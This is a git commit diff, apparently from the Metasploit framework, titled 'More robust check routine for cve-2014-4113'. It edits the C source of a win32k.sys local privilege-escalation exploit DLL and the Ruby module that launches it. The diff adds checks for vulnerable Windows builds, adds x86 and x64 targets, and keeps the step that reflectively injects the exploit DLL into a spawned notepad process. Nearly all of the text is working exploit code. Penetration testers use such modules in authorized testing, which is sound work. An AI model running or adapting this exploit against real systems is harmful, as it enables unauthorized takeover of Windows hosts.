More robust check routine for cve-2014-4113

bug/bundler_fix
Spencer McIntyre 2014-10-27 11:19:12 -04:00
parent 5fa0403ac5
commit 46b1abac4a
2 changed files with 33 additions and 10 deletions

View File

@ -87,7 +87,7 @@ LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
HookCallbackClue = 1;
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
#ifdef _M_X64
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 0x18), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
#else
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
#endif

View File

@ -48,17 +48,18 @@ class Metasploit3 < Msf::Exploit::Local
# * Windows 2003 SP2
# * Windows 7 SP1
# * Windows 2008
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
# Tested on (64 bits):
# * Windows 2008 R2 SP1
# * Windows 7 SP1
[ 'Automatic', { } ],
# * Windows 2008 R2 SP1
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' =>
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
'References' =>
[
['CVE', '2014-4113'],
['OSVDB', '113167'],
@ -78,11 +79,28 @@ class Metasploit3 < Msf::Exploit::Local
return Exploit::CheckCode::Unknown
end
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
Exploit::CheckCode::Detected
# Neither target suports Windows 8 or 8.1
return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86
return Exploit::CheckCode::Vulnerable if [2600, 3790, 7600].include?(build)
return Exploit::CheckCode::Vulnerable if revision <= 18577
else
return Exploit::CheckCode::Vulnerable if build == 7601 && revision <= 18577
end
return Exploit::CheckCode::Unknown
end
def exploit
@ -90,11 +108,16 @@ class Metasploit3 < Msf::Exploit::Local
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
target_arch = ARCH_X86
if check != Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo["Architecture"] =~ /x64/
target_arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
print_status('Launching notepad to host the exploit...')
@ -110,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
if target_arch == ARCH_X86
if target.arch.first == ARCH_X86
dll_file_name = 'cve-2014-4113.x86.dll'
else
dll_file_name = 'cve-2014-4113.x64.dll'